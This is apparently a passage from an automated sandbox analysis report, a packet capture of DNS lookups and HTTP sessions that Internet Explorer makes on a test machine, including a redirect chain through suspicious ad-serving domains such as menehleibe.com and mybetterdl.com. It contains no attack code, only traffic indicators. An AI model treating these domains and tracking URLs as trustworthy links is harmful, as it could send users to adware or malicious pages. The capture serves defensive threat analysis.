                                                                                                                                                                      Sep 14, 2021 16:03:22.631850958 CEST192.168.2.68.8.8.80x9179Standard query (0)p226681.mybetterdl.comA (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:23.476247072 CEST192.168.2.68.8.8.80xd2e1Standard query (0)gertrk.comA (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.063437939 CEST192.168.2.68.8.8.80xb4d3Standard query (0)google.comA (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.214965105 CEST192.168.2.68.8.8.80x6538Standard query (0)www.google.comA (IP address)IN (0x0001)

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                      Sep 14, 2021 16:03:19.756581068 CEST8.8.8.8192.168.2.60x9451No error (0)menehleibe.com173.239.8.164A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:19.756581068 CEST8.8.8.8192.168.2.60x9451No error (0)menehleibe.com74.206.228.78A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:19.756581068 CEST8.8.8.8192.168.2.60x9451No error (0)menehleibe.com173.239.5.6A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:21.848687887 CEST8.8.8.8192.168.2.60x1065No error (0)mybetterdl.com173.192.101.24A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:22.679900885 CEST8.8.8.8192.168.2.60x9179No error (0)p226681.mybetterdl.com173.192.101.24A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:23.514079094 CEST8.8.8.8192.168.2.60xd2e1No error (0)gertrk.com168.119.139.96A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.098937035 CEST8.8.8.8192.168.2.60xb4d3No error (0)google.com142.250.203.110A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.244478941 CEST8.8.8.8192.168.2.60x6538No error (0)www.google.com142.250.102.106A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.244478941 CEST8.8.8.8192.168.2.60x6538No error (0)www.google.com142.250.102.105A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.244478941 CEST8.8.8.8192.168.2.60x6538No error (0)www.google.com142.250.102.99A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.244478941 CEST8.8.8.8192.168.2.60x6538No error (0)www.google.com142.250.102.147A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.244478941 CEST8.8.8.8192.168.2.60x6538No error (0)www.google.com142.250.102.104A (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:24.244478941 CEST8.8.8.8192.168.2.60x6538No error (0)www.google.com142.250.102.103A (IP address)IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • menehleibe.com
                                                                                                                                                                        • mybetterdl.com
                                                                                                                                                                        • p226681.mybetterdl.com
                                                                                                                                                                        • gertrk.com
                                                                                                                                                                      • www.google.com
                                                                                                                                                                      • https:
                                                                                                                                                                      • google.com

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.649739173.192.101.24443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.649741173.192.101.24443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      10192.168.2.649748142.250.203.11080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Sep 14, 2021 16:03:24.150072098 CEST1064OUTGET / HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Sep 14, 2021 16:03:24.203008890 CEST1071INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Location: http://www.google.com/
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Expires: Thu, 14 Oct 2021 14:03:24 GMT
                                                                                                                                                                      Cache-Control: public, max-age=2592000
                                                                                                                                                                      Server: gws
                                                                                                                                                                      Content-Length: 219
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      11192.168.2.649749142.250.102.10680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Sep 14, 2021 16:03:24.290153980 CEST1071OUTGET / HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Sep 14, 2021 16:03:24.355325937 CEST1072INHTTP/1.1 302 Found
                                                                                                                                                                      Location: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Server: gws
                                                                                                                                                                      Content-Length: 231
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 67 77 73 5f 72 64 3d 73 73 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/?gws_rd=ssl">here</A>.</BODY></HTML>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.649743168.119.139.96443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      3192.168.2.649744168.119.139.96443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      4192.168.2.649746168.119.139.96443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      5192.168.2.649751142.250.102.106443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      6192.168.2.649752142.250.102.106443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      7192.168.2.649755142.250.102.106443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      8192.168.2.649757142.250.102.106443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      9192.168.2.649737173.239.8.16480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Sep 14, 2021 16:03:19.921633005 CEST1024OUTGET /images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Sep 14, 2021 16:03:20.024328947 CEST1024INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:19 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 145
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Location: http://menehleibe.com/
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
                                                                                                                                                                      Sep 14, 2021 16:03:20.027059078 CEST1024OUTGET / HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Sep 14, 2021 16:03:20.137682915 CEST1025INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:20 GMT
                                                                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                      Data Raw: 66 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 90 bd 6e c3 30 0c 84 f7 3c 85 a0 29 19 6a 75 c9 d0 96 d6 50 a0 43 81 be 43 20 4b 74 44 40 7f 95 a9 04 7e fb ca 49 d0 a1 43 37 1e 70 c7 fb 48 f0 1c 83 06 8f c6 69 88 c8 46 78 e6 f2 84 df 8d 2e a3 ac 38 57 5c bc 14 36 27 c6 c4 a3 3c be 89 56 c3 b8 99 5e 95 ba 5e 5f 86 88 09 7d 40 9a 70 b0 39 2a a9 81 89 03 ea af 6c 1c a5 33 a8 bb 04 75 eb d8 c1 94 dd aa 61 ce 35 8a de e7 b3 1b 65 c9 0b 4b 61 2c 53 4e a3 7c ec fe bb 57 b0 a9 67 ec 08 27 ce 45 0a ea b9 3a f7 36 4a a5 b1 e0 b5 60 8f 92 73 98 a4 48 26 76 45 56 8a 8b 09 ad 8f cf ff 1a e7 e9 d7 c8 b5 a1 54 1a d4 06 a8 77 b0 d8 4a 85 b5 cb b6 75 20 1e 3a c1 47 c0 6d 7c 5f 3f dd 7e 43 38 0c 4b 9b 22 f1 fe 00 ea 61 07 75 bf 52 dd be fb 03 9f 2c e3 4e 64 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: f8}n0<)juPCC KtD@~IC7pHiFx.8W\6'<V^^_}@p9*l3ua5eKa,SN|Wg'E:6J`sH&vEVTwJu :Gm|_?~C8K"auR,Nd0
                                                                                                                                                                      Sep 14, 2021 16:03:20.611062050 CEST1025OUTPOST / HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Content-Length: 12
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Data Raw: 69 63 3d 30 26 66 62 3d 74 72 75 65
                                                                                                                                                                      Data Ascii: ic=0&fb=true
                                                                                                                                                                      Sep 14, 2021 16:03:21.647305965 CEST1027INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:21 GMT
                                                                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Set-Cookie: ipc=eyJ2ZXJzaW9uIjoxLCJzdWJJZCI6MywiZm9sZGVySWQiOjEsImZlZWRJZCI6MjEsInRzIjoxNjMxNjI4MjAxLCJoYXNoIjoiN2E3ZmJiNTgifQ==;Expires=Tue, 14-Sep-2021 15:03:21 GMT;Max-Age=3600
                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                      Data Raw: 35 32 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 35 95 b7 d2 ab 58 02 84 f3 7d 8a a9 9b 4c c4 fc b8 83 99 d5 fd b7 00 21 40 08 e1 6d a2 c2 7b 23 38 08 f3 f4 7b 6b 4c d8 1d 74 57 75 f0 f5 a5 82 7d f7 7d a9 f2 38 fb be f4 39 8c 7f 1b e2 3e ff f9 63 ce 8b 7c 9e f3 f9 c7 6f e9 38 c0 7c 80 3f 7f 0c 23 f2 af 8b 6c 55 3e 20 d9 b8 0d e5 1c 67 f9 8f ef 0b ac 61 97 7f 3f c6 38 ab 87 f2 f2 f5 b7 bc 7c fd 95 fb 9f 4b 32 66 c7 f7 65 49 e7 7a 82 df dd 98 c6 b0 1e 87 3f aa 5f 71 3f 7f af 20 9c 96 3f bf be fa 23 c9 21 cc e7 ac fb 23 1d fb af d8 fe 2a f2 3c 4b bb 3a 6d ff b7 fc 34 7a 4b 4b 01 2d 0c 55 58 35 34 9a 23 0a db 1e a0 2d ee f9 ac 56 db de 15 b6 e6 12 f0 58 f7 d7 0e 38 29 9a 7d d7 b0 ef bd 71 3e f1 94 2d 70 91 7e 7d b8 27 42 4d 8c 34 f5 d7 48 62 1c 61 75 22 6a ba 8e e2 d6 1d f1 84 b7 d1 52 9e 3c d9 c9 28 ba 96 4c 0e c4 5d 39 17 44 e2 8f 7b bb bd aa 61 7c c8 be e7 3e f0 32 28 dd 23 86 0b 7f d3 62 db 49 31 cb 04 d6 de 9a 06 ff 3e 0e 67 20 52 18 3c 8f 17 ba da b2 65 ef 6d af 1f 8c 27 6b 29 03 24 45 77 c8 a6 5f 72 46 4e 47 e4 36 69 5d c2 5a f2 0e 28 6f 6f 9e b8 09 6f 4f 8c a5 3f 8f b9 68 23 f6 2d 02 94 85 20 b6 c2 a2 45 0b 27 8e 14 69 93 a0 77 db 29 a1 49 31 05 32 1f d5 1b 33 05 37 47 61 78 e4 8f f5 e4 df fb 6c 87 72 3d 1c 96 52 5b 94 7d 3a 41 cc 17 ac 21 53 45 0a 08 46 03 be f8 d1 3e 55 13 af ae 2c ad 49 c3 52 d8 4c 03 d5 6d 54 68 07 83 1c 43 f9 2d ae f5 b1 3a da e1 37 d6 d1 08 aa 26 09 eb 1c d9 cc 2b 49 dd 98 84 f7 b2 ad 9d 23 c8 04 d0 be 4c 52 e0 d7 53 ac 4a b5 1b 5f 50 27 23 61 6f 84 77 b2 df 5b 60 9e bf a6 d2 b6 6d 11 d5 2d 46 f8 ea 35 ad 1b 4e a1 b2 18 fa 72 22 73 7b 55 49 59 77 d7 10 e5 05 b1 7d af bc 0f 61 9b 7d 82 af 5b c2 02 ab 93 34 9a 7b 4f ba ec 79 37 4a 2c 8d 16 92 31 00 da 11 79 43 b0 7a 6d 39 bb 1d 16 b7 9e 9e d6 75 a5 74 ef 38 1a ed 31 c7 c3 ee 9c 69 d4 bf bd cb 99 e2 aa 31 4e 4c 9b 3f 85 66 bd 87 cf 89 2c 37 37 f4 50 cf ff 58 51 dc f4 ae af bf bc 7d 64 b4 07 52 35 ee 32 1b 32 83 fe 6a 74 fb eb be 86 e4 87 a9 07 71 1c 91 03 79 0f 87 8b 52 13 ee 56 84 b1 b1 61 f6 0c af 80 51 54 52 50 05 29 e5 10 37 ee d9 2c 5d 16 c4 41 80 b2 26 e4 1d 03 32 45 6f b7 08 5f 86 f3 f4 27 ff 14 55 81 0d 5c dd 1a f3 57 96 0c 62 c9 55 f2 fe 1a e8 88 84 9e 1e 66 3e e8 7c 6a 5e af c6 3b ce e5 14 5d cf d4 71 d9 a4 ec 5f f5 80 f8 78 07 3e e3 bc 1b b7 de 8c 9d 9b 92 1e 24 0f ca 55 1f b4 3b 38 22 f9 61 5e 01 4d ed a1 9f 18 28 11 6b 0c 91 39 9b 48 b4 da 34 9c 82 80 79 80 47 88 2a c8 c0 74 16 3b 46 4b 76 e4 ae b8 2a 07 4a 3f 76 47 3b f7 4e 7c 4a 91 da 6b 7c 25 82 f9 8c 6b 92 b3 82 b2 73 34 ba 33 b8 4e 59 96 ac 29 87 4e 2f 79 3d f1 86 07 95 69 f3 d3 f0 c8 ed 48 bd 80 58 80 be c3 bb 16 e4 99 e0 8b f8 0c 92 fa a9 a7 01 71 00 a3 df 10 94 77 33 3e
                                                                                                                                                                      Data Ascii: 5225X}L!@m{#8{kLtWu}}89>c|o8|?#lU> ga?8|K2feIz?_q? ?#!#*<K:m4zKK-UX54#-VX8)}q>-p~}'BM4Hbau"jR<(L]9D{a|>2(#bI1>g R<em'k)$Ew_rFNG6i]Z(oooO?h#- E'iw)I1237Gaxlr=R[}:A!SEF>U,IRLmThC-:7&+I#LRSJ_P'#aow[`m-F5Nr"s{UIYw}a}[4{Oy7J,1yCzm9ut81i1NL?f,77PXQ}dR522jtqyRVaQTRP)7,]A&2Eo_'U\WbUf>|j^;]q_x>$U;8"a^M(k9H4yG*t;FKv*J?vG;N|Jk|%ks43NY)N/y=iHXqw3>
                                                                                                                                                                      Sep 14, 2021 16:03:21.647342920 CEST1027INData Raw: fa d0 da a7 b3 1d 03 bf b5 2c 17 c7 89 9e f7 b8 49 13 d2 d4 2c d2 2b db 02 6f 70 53 fc 26 53 67 b4 be fd 15 bf 76 35 45 09 48 b0 a6 dc b5 08 70 c8 1b 9d 45 4c b3 a9 17 13 89 f6 10 7e 50 f4 55 0b 16 f5 a6 8a 87 c2 9a 51 29 85 18 e6 97 85 4e bc 33
                                                                                                                                                                      Data Ascii: ,I,+opS&Sgv5EHpEL~PUQ)N3}4etsDNE6 \bIv8Z=bd^q07K'_<'G\(SzTIs,RMvLO@>h,_S3'C/4c5~)nQ[c


                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.649739173.192.101.24443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-09-14 14:03:22 UTC0OUTGET /aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrmTazGZKmMBhE5rzai4ARXglTM7lPAlIssdjgnlOgBObVnL6dMrNPV4wycVX3s5OxtJMXedCWE2r5biNOcX3y5Pmw-0BUdBZv7MvlSTP2Fk9AaabOem2Q73GpjsG_dwXVnUc2FH6zZuqWu2Dli66C-XucADfX2tBPlR3prQOfp40mttv00_iCR6q6fLI9QZgGY11WgfO3qdEgV2xwoj0eGTIxBicwTEMicE9X3AYQsCpAEn3pdnGSoQpHTA7Kz9fo94mKnTULy2teQgTesP9hhxLreOeHrbCzwHSSbH-FJZx15JZAYCxI8gV6bvS4IWlDg_vysGgTqrjiFCjhA5kocz54NYxtQVvyXSZspRWMKjI1QYN8ennj2JVFvWfYyzeLbGr1ovqBCtNBvJi2ztcTgBlsW0SM8XIsRgd4QMcWZcycyUPzb9Wd1bDxFTAWmSXH43ynD5UObBi5FyNDw8qKKmoCnfedHiztWYQxKotKUGaKd1m_k2iMIc5SBU1Vi7-MGW4_Mi4WYIzJL61eBLaioPhng2BQ6PDt8aAWdDMho29RkRFHVPIQb3W3nWMGo8srLOHYnfrFRuEDgcm6cqkr2IQD0T7sB-GexA77NdWEi2cdlkkLEB146pQ HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: mybetterdl.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2021-09-14 14:03:22 UTC1INHTTP/1.1 302
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:22 GMT
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: rhid=79630578833; Max-Age=15552000; Expires=Sun, 13-Mar-2022 14:03:22 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Location: https://p226681.mybetterdl.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.649741173.192.101.24443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
